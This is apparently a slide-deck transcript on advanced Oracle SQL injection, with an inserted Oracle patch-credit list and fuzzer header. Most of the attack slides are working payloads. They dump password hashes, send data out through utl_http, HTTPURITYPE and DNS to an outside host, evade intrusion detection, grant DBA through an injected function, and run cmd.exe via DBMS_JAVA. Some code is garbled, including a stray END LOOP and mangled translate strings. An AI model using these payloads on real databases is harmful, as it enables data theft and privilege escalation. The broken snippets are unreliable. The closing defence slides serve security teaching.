Advanced SQL Injection Techniques (and how to protect against them)

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About Me

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CREATE OR REPLACE PACKAGE fuzzor

-- FuzzOr - An Oracle PL/SQL fuzzer written in PL/SQL.
-- The FuzzOr is a PL/SQL package that uses backend tables to drive its executions and store the results.
--
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--
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--
-- Prerequisites:
-- The user running this package should be directly (not through a role) granted the 'create table', 'create sequence'
--
-- Usage (of course, you should choose a different username/password):
-- SYS> CREATE USER fuzz IDENTIFIED BY fuzz DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;
-- -- Granting the execute any procedure is optional - and dangerous. Never do this on production. You can grant specific
-- SYS> GRANT create session, create table, create sequence, create procedure, execute any procedure TO fuzz;
-- SYS> ALTER USER fuzz QUOTA 300m ON users;
-- SYS> CONN fuzz/fuzz
-- -- Make sure that fuzzor.sql is on the SQL PATH
-- FUZZ> set serveroutput on
-- FUZZ> @fuzzor
Credit Statement

The following people or organizations discovered and brought security vulnerabilities addressed by this Critical Patch Update to Oracle:

- Arciemowicz of SecurityReasearch
- Okan Basegmez of DORASEC Consulting
- Check Point Software
- Fabian Martir of AppArmor
- Roy Fox of Sentrigo
- Tobias Klein
- Ofer Maor of Hacktics
- MarkoT of Corelan Team
- Slavik Markovich of Sentrigo
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- An Anonymous Reporter of TippingPoint's Zero Day Initiative
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- Sumit Siddharth
- Frank Stuart
- Laszlo Toth
- Janek Vind of iDefense
- Dennis Yurichev of Sentrigo

Security-In-Depth Contributors

Oracle provides recognition to people that have contributed to our Security-In-Depth program (see FAQ). People are recognized only if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modifications to the product in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates.

For this Critical Patch Update, Oracle recognizes Stefano Di Paola of Minded Security; Alexandr Polyakov of Digital Security; Ian McAlpine; Chris Weber of Casaba Security; and Paul M. Wright for contributions to Oracle's Security-In-Depth program.

Critical Patch Update Schedule

Critical Patch Updates are typically released on the Tuesday closest to the 15th day of January, April, July and October. Starting with this release of Critical Patch Updates will be on the Tuesday closest to the 17th day of January, April, July and October. The next four dates are:

- 12 October 2010
- 18 January 2011
- 19 April 2011
- 19 July 2011
Agenda

- Describe SQL Injection
- What's unique about Oracle
- Identifying SQL Injection in web applications
- Exploiting SQL Injection
  - In-band
  - Out-of-band
  - Blind
- Advanced Techniques
- SQL Injection within the database
- Protecting against SQL injection
Why are Databases a Security Threat?

Databases hold volumes of sensitive data
\textit{e.g.} credit card numbers, financial results, bank
records, billing information, intellectual property, customer lists, personal data …

But:
\begin{itemize}
  \item Databases are not monitored
  \item Seldom upgraded
  \item Not patched
\end{itemize}

This makes databases an easy target
How easy is it to break into a database?

Very easy....
Security Problems

- Weak / default passwords + poorly encrypted
- Misconfigurations
- Missing security patches/patchsets/old versions/0days
- Excessive privileges
- Unsecured Listener
- No internal network boundaries
- External resources
  - Contractors, outsourcing, etc.
- No encryption of data in motion and at rest
- No monitoring of access and logs
Database Attack Vectors

- OS attacks
- Network attacks
- SQL Injection
  - Many types and methods
- Buffer Overflows
- DB Engine bugs
- Password attacks
- Coffee Attack
The Attack Of The Janitor
A technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
Breach Example - Heartland

- 4 or more criminals (one previously convicted in TJX and many more hacks) hacked into outward facing application using SQL Injection
- Used backend SQL server to take control of other systems
- Found workstation with VPN connection open to payment systems
- Result: estimated 130 million credit and debit card numbers stolen from databases
- Could it be stopped?
SQL Injection

- Exists in any layer of any application
  - C/S and Web Applications
  - Stored program units
    - Built in
    - User created
- Has many forms
  - Extra queries, unions, order by, sub selects
Simple Example

Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(
"select * from user_details where user_name = '' + username + '' and password = '' + password + "''");

username = '' or 1=1 --"

Select * from user_details where user_name = '' or 1=1 -- ' and password = ''
No stacked queries

- Cannot add "; do something nasty"

```sql
select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
EXEC master.dbo.xp_sendmail
    @recipients=N'royf@sentrigo.com',
    @query = N'select user, password from sys.syslogins
    where password is not null' ;

- Unless you get really lucky to be injected into PL/SQL
Native error messages are not controlled

- SQL Server

```sql
select * from users where username = ''
having 1=1 -- and password = ''
Msg 8120, Level 16, State 1, Line 1
Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
```
What's Unique About Oracle - III

- No easy way to escape DB to OS
  - No convenient xp_cmdshell
- No easy way to do time based blind SQL injection (more later)
  - No convenient WAITFOR DELAY
- Although very large attack surface, very hard to take advantage from within SELECT statements
Identifying SQL Injection - Web

- Find a target via Google ("Google dorks")
  - ociparse, ociexecute, OCIStmtExecute
  - ORA-01756, 907, 933, 917, 900, 903, 906, 923, 970, 1742, 1789
  - Oracle+JDBC+Driver
  - inurl:/pls/portal30

- Web application security scanner (Acunetix, Pangolin, SQLMap)

- Manually
  - Pass in '
SQL Injection Types

- In band – Use injection to return extra data
  - Part of normal result set (unions)
  - In error messages

- Out of band – Use alternative route like UTL_HTTP, DNS to extract data

- Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more
In the previous example pass username as "' and 1=0 union select banner from v$version where rownum = 1 --"

So the statement becomes

```
select * from user_details where user_name = '' and 1=0 union select banner from v$version where rownum = 1 --' and password = ''
```

Find number of columns by adding nulls to the column list or by using order by #
SQL> select utl_inaddr.get_host_name('127.0.0.1') from dual;
localhost
SQL> select utl_inaddr.get_host_name((select username||'='||password
from dba_users where rownum=1)) from dual;
select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1))
from dual
*
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at "SYS.UTL_INADDR", line 4
ORA-06512: at "SYS.UTL_INADDR", line 35
ORA-06512: at line 1
- `utl_inaddr.get_host_name` is blocked by default on newer databases.
- Many other options:
  - `dbms_aw_xml.readawmetadata`
  - `ordsys.ord_dicom.getmappingxpath`
  - `ctxsys.drithsx.sn`

```sql
' or dbms_aw_xml.readawmetadata((select sys_context('USERENV', 'SESSION_USER') from dual), null) is null --
```
SQL Injection Out-of-band

- Send information via HTTP to an external site via HTTPURITYPE

```sql
select HTTPURITYPE('http://www.sentrigio.com/'||(select password from dba_users where rownum=1)).getclob() from dual;
```

- Send information via HTTP to an external site via utl_http

```sql
select utl_http.request ('http://www.sentrigio.com/'||(select password from dba_users where rownum=1)) from dual;
```

- Send information via DNS (max. 64 bytes) to an external site

```sql
select utl_http.request ('http://www.'||(select password from dba_users where rownum=1)||'.sentrigio.com/' ) from dual;
```

DNS-Request: www.8A8F025737A9097A.sentrigio.com
SELECT SYS.DBMS_LDAP.INIT((SELECT user from dual) || '.sentrigo.com',80) FROM DUAL
Blind SQL Injection - I

- A guessing game
- Binary results – either our guess is true or it is false
- Requires many more queries
  - Time consuming and resource consuming
  - Can benefit from parallelizing
  - Must be automated
Blind SQL Injection - I

Pseudo-Code:
If the first character of the sys-hashkey is a 'A'
then
select count(*) from all_objects,all_objects
else
select count(*) from dual
end if;
Blind SQL Injection - II

- Either use decode or case statements
- Customary used with short or long queries since `dbms_lock.sleep` is not a function
- Can be used with functions that receive a timeout like `dbms_pipe.receive_message`

```sql
' or 1 = case when substr(user, 1, 1) = 'S'
then dbms_pipe.receive_message('kuku', 10)
else 1 end --
' or 1 = decode(substr(user, 1, 1) = 'S',
dbms_pipe.receive_message ('kuku', 10), 1)
```
Advanced Techniques – Evasion - I

- **Concatenation**

  
  `' or dbms_aw_xml.readawmetadata((select sys_context('US' || 'ERENV', 'SESS' || 'ION_US' || 'ER') from dual), null) is null --`

- **Changing case**

  
  `' or dbMS_aW_xMl.reAdaWmetaData((select SYS_C0NtExt('US' || 'ERENV', 'SESS' || 'ION_US' || 'ER') from dUAl), null) is null --`

- **Using alternative functions**

  - Instead of UTL_INADDR
  - dbms_aw_xml.readawmetadata
  - ordsys.ord_dicom.getmappingxpath
  - ctxsys.drithsx.sn
Advanced Techniques – Evasion - II

- Conversions
  - Translate
    
    ```sql
    begin
    dbms_output.put_line(translate('userenv', 'qwertyuiopasdfghjklzxcvbnm().,0123456789;[]''', '][;|9876543210.,')
    (mnbvcxzlkjhgfdsapoiuytre~'));end;
    72;|;zc
    
    - CHR
    ' or dbms_aw_xml.readawmetadata((select
    sys_context(chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||
    chr(78)||chr(86), chr( 68)||chr(66)||chr(95)||chr(78)||
    chr(65)||chr(77)||chr(69)) from dual), null) is null --
    
    - Base64
    dbms_output.put_line(utl_encode.text_encode('userenv', 'WE8ISO8859P1', UTL_ENCODE.BASE64));end;
    /
    dXNlcmVudg==
Advanced Techniques – Evasion - III

- Comments instead of spaces

`'/**/or/**/dbms_aw_xml.readawmetadata((select/**/sys_context(chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86), chr(68)||chr(66)||chr(95)||chr(78)||chr(65)||chr(77)||chr(69))/**/from/**/dual),null)/**/is/**/null--`

- Randomization
  - All of the above techniques used in random
Advanced Techniques – Data - I

- Combining multiple rows into one result
  - STRAGG – available from 11g, sometimes available as a custom function in earlier versions. Be careful as the implementation seems to be buggy and can crash your session.

  ```
  ' or dbms_aw_xml.readawmetadata((select sys.stragg(username || ',') from all_users), null) is null --
  ```
Combining multiple rows into one result

- XML

```sql
' or dbms_aw_xml.readawmetadata((select xmltransform
(sys_xmlagg(sys_xmlgen(username))),xmltype('<?xml
version="1.0"?><xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:templ
ate match="/"><!--xsl:for-each
select="/ROWSET/USERNAME">xsl:value-of
select="text()";/</xsl:for-
each></xsl:template></xsl:stylesheet>')).getstringval()
listagg from all_users), null) is null --
```
Advanced Techniques – Data - III

- Combining multiple rows into one result
  - Connect By

  ' or dbms_aw_xml.readawmetadata((SELECT SUBSTR(SYS_CONNECT_BY_PATH (username, ';'), 2) csv FROM (SELECT username, ROW_NUMBER() OVER (ORDER BY username) rn, COUNT(*) OVER () cnt FROM all_users) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn + 1), null) is null --
Privilege Escalation I

- Use of privileged user by the application
- Injection is in privileged stored program
- DML/DDL/DCL is possible

  - Auxiliary functions
  - SYS.KUPP$PROC.CREATE_MASTER_PROC
  - DBMS_REPCAT_RPC.VALIDATE_REMOTE_RPC (Fixed in July 09 CPU)
Privileged Escalation II

- Injection is in an unprivileged procedure
  - Many vulnerabilities exist

- Escape to the OS
  - Using Java
    - SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST') FROM DUAL) is not null --
    - SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main', 'c:\\windows\\system32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null –
  - Using DBMS_SCHEDULER
SQL Injection – PL/SQL

- **Two execution modes**
  - Definer rights
  - Invoker rights

- **Source code not always available**
  - There are several un-wrappers available
  - One can find injections without source
    - Find dependencies
    - Trial and error
    - v$sql
    - Fuzzer
    - Oracle Patches
create or replace
PROCEDURE retrieve_data_bad(
p_owner    IN VARCHAR2,
p_table_name IN VARCHAR2,
p_rows     IN NUMBER := 10)
AS
    l_cr        INTEGER;
    l_res       INTEGER;
    l_col_count INTEGER;
    l_rec_tab   dbms_sql.desc_tab;
    l_res_col   VARCHAR2(32000);
BEGIN
    l_cr := dbms_sql.open_cursor;
    dbms_sql.parse(l_cr, 'SELECT * FROM ' || p_owner || '.' || p_table_name || ' WHERE ROWNUM <= ' || p_rows,
                    dbms_sql.NATIVE);
    dbms_sql.describe_columns(l_cr, l_col_count, l_rec_tab);
    FOR l_i IN 1 .. l_col_count LOOP
        dbms_sql.define_column_char(l_cr, l_i, l_res_col, 32000);
    END LOOP;
    l_res := dbms_sql.execute(l_cr);
    LOOP
        l_res := dbms_sql.fetch_rows(l_cr);
        EXIT WHEN l_res = 0;
    END LOOP;
    FOR l_i IN 1 .. l_col_count LOOP
        dbms_sql.column_value_char(l_cr, l_i, l_res_col);
        dbms_output.put_line(l_rec_tab(l_i).col_name || ' = ' || TRIM(l_res_col));
    END LOOP;
END LOOP;
dbms_sql.close_cursor(l_cr);
EXCEPTION
    WHEN OTHERS THEN
        IF dbms_sql.is_open(l_cr) THEN
            dbms_sql.close_cursor(l_cr);
        END IF;
        raise_application_error(-20001, 'Error executing select statement: ' || sqlerrm);
END retrieve_data_bad;
SQL Injection – Inject SQL

```sql
SCOTT> set serveroutput on
SCOTT> exec sys.retrieve_data_bad('SCOTT', 'EMP', 1)
EMPNO = 7369
ENAME = SMITH
JOB = CLERK
MGR = 7902
HIREDATE = 17-DEC-80
SAL = 800
COMM =
DEPTNO = 20
```
SQL Injection – Inject SQL

SCOTT> exec sys.retrieve_data_bad('dual where 1=2 union select name || ''' || password from user$ where user# = 0--', null);

DUMMY = SYS:8A8F025737A9097A

SELECT * FROM dual where 1=2 union select name || ':' || password from user$ where user# = 0--. WHERE ROWNUM <= 10
CREATE OR REPLACE FUNCTION attack
RETURN VARCHAR2
AUTHID CURRENT_USER
IS
    PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
    RETURN '1';
END attack;
/

SQL Injection – Inject Functions

SCOTT> exec sys.retrieve_data_bad('dual where ''x'' = scott.attack() --', null)
PL/SQL procedure successfully completed.

SCOTT> select * from user_role_privs;

<table>
<thead>
<tr>
<th>USERNAME</th>
<th>GRANTED_ROLE</th>
<th>ADM</th>
<th>DEF</th>
<th>OS_</th>
</tr>
</thead>
<tbody>
<tr>
<td>SCOTT</td>
<td>DBA</td>
<td>NO</td>
<td>YES</td>
<td>NO</td>
</tr>
<tr>
<td>SCOTT</td>
<td>CONNECT</td>
<td>NO</td>
<td>YES</td>
<td>NO</td>
</tr>
<tr>
<td>SCOTT</td>
<td>RESOURCE</td>
<td>NO</td>
<td>YES</td>
<td>NO</td>
</tr>
</tbody>
</table>

* The resulting SQL

```
SELECT * FROM dual where 'x' = scott.attack() --. WHERE ROWNUM <= 10
```
DECLARE
  l_cr    NUMBER;
  l_res   NUMBER;
BEGIN
  l_cr := dbms_sql.open_cursor;
  dbms_sql.parse(l_cr,
                 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN
                 EXECUTE IMMEDIATE ''GRANT dba to public''; END;',
                 dbms_sql.native);
  sys.retrieve_data_bad('dual where 1 = dbms_sql.execute(''
                        || l_cr || ')  --', null);
END;
/
* Does not work in 11g
DECLARE 
  l_cr        NUMBER; 
  l_res       NUMBER; 
BEGIN 
  l_cr := dbms_sql.open_cursor; 
  dbms_sql.parse(l_cr, 
    translate('1;vm3|; 4|3.13 3795z51572_9|3z23v965ze x; .6z 
    ;b;v79; 611;1639; ~.|3z9 1x3 95 
    47x{m6v~e ;z1e', 
    ']',[;|9876543210.,)(mnbvctxzlkhghdfsapoiuytrerq~}', 
    'qwertyuiopasdfsghjklzxcvbnm(),.0123456789;[[]'''), 
    dbms_sql.native); 
  sys.retrieve_data_bad('dual where 1 = dbms_sql.execute(' || 
    l_cr || ' ) --', null); 
END; 
/

SQL Injection – IDS Evasion
Of course, the easiest is to run code with invoker rights

```sql
CREATE PROCEDURE retrieve_data_bad(
    p_owner          IN VARCHAR2,
    p_table_name     IN VARCHAR2,
    p_rows           IN NUMBER := 10)
AUTHID CURRENT_USER
AS
```
SQL Injection – Fix I

- Let's fix the code:

```sql
l_owner := sys.dbms_assert.schema_name(p_owner);
l_table_name :=
    sys.dbms_assert.sql_object_name(l_owner || '.' ||
    p_table_name);
dbms_sql.parse(l_cr, 'SELECT * FROM ' ||
    l_owner || '.' ||
    p_table_name || ' WHERE ROWNUM <= ' ||
    p_rows, dbms_sql.NATIVE);
```

But, what about the following ("object injection"): create user "emp where l=scott.attack() --"...
create table "emp where l=scott.attack() --"...
SQL Injection – Fix II

- Enquote when needed

```sql
l_owner := sys.dbms_assert.enquote_name(sys.dbms_assert.schema_name(p_owner));
l_table_name := sys.dbms_assert.enquote_name(p_table_name);
```
SQL Injection – Lateral Injection

- Code does not have to receive parameters to be injected

```sql
EXECUTE IMMEDIATE 'update x set y = '''' || SYSDATE || '''' ;
```

- Running this code before:

```sql
ALTER SESSION SET NLS_DATE_FORMAT = ''"1'' and scott.attack()=''x''--'' ;
```

```sql
ALTER SESSION SET NLS_NUMERIC_CHARACTERS = '''' .'' ;
```
SQL Injection – Fix III

- Use bind variables

```sql
dbms_sql.parse(l_cr, 'SELECT * FROM ' ||
  l_owner || '.' || l_table_name || ' WHERE
  ROWNUM <= :r', dbms_sql.NATIVE);
dbms_sql.bind_variable(l_cr, 'r', p_rows);
```

* You can use bind variables with EXECUTE IMMEDIATE with the USING keyword
Finding Vulnerable Code

- Finding dynamic query code

```sql
select * from dba_dependencies where referenced_name = 'DBMS_SQL'
```

```sql
select * from dba_source where upper(text) like '%IMMEDIATE%'
```
Fuzz testing or fuzzing is a software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example, by crashing, or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior.
PL/SQL – The Right Tool

§ Easy to run SQL
§ Built-in the database
§ Cross platform
§ Good enough for the task
§ DBAs already speak it fluently
§ Can be easily scheduled as a DB job
Caution – Use With Care

- Fuzzing on production is a BIG no-no
- Be sure to receive permission from the DB owner
- Clean fuzz run does not mean you are secure
Invoking Fuzzed Code

- Catch interesting errors
  - ORA-00921: unexpected end of SQL command
  - ORA-00936: missing expression
  - ORA-00933: SQL command not properly ended
  - ORA-00970, ORA-00907, ORA-01756, ORA-00923, ORA-00900, PLS-00103, LPX-00601, ORA-00604
  - Crashes – for C code
    - ORA-03113 – might also be an instance crash
    - ORA-03114, ORA-01012
    - ORA-00600 – Internal error
  - etc.
Defense - Developers

- Use **static SQL** – 99% of web applications should never use dynamic statements
- Use **bind** variables – where possible
- Always **validate** user/database input for dynamic statements (dbms_assert)
- Be extra careful with dynamic statements - get 3 people who do not like you to **review and approve** your code
- Use **programmatic frameworks** that encourage (almost force) bind variables
  - For example: Hibernate (Java O/R mapping)
- Database schema for your application should have **minimal privileges**
Defense - Developers

- Avoid **hard-coding** username/password
- **Wrap** sensitive/important program code – even if not really safe
- Use **fully qualified names** for function and procedure calls
- Use **invoker** rights
- Be careful with **file access**
- Be careful with **OS command execution**
- Never return **DB errors** to the end-user
Defense - Managers

- Setup secure coding policies for the different languages
- Make the coding policies part of every contract – external and internal
- Default document for all developers
Defense - DBAs

- Apply **patch sets, upgrades and CPUs**
  - Easier said than done
- Check for default and weak **passwords** regularly
- Secure the **network**
  - Listener passwords
  - Valid node checking + firewall
- Use **encryption** where appropriate
- **Install** only what you **use**, remove all else
  - Reduce your attack surface
- The **least privilege principle**
  - Lock down packages
    - System access, file access, network access
Defense - Awareness

- Think like a hacker
  - Learn about exploits
  - Always look for security issues
    - Configuration, permissions, bugs

- Learn and use available tools
  - SQLMap, Pangolin, Matrixay, darkOraSQLLi.py, SQLPowerInjector, mod_security, OAK, bfora.pl, checkpwd, orabf, nmap, tnsprobe, WinSID, woraauthbf, tnscmd, Inguma, Metasploit, Wireshark, Hydra, Cryptool, etc.
Defense - Hedgehog

- Try Hedgehog - http://www.sentrigo.com
  - Virtual patching
  - SQL Injection protection
  - Fine grain auditing
  - Centralized management
  - More…

- Try DB Scanner
  - Weak passwords
  - Missing patches / CPUs
  - Malware detection
  - More…
Questions?

Thanks !!!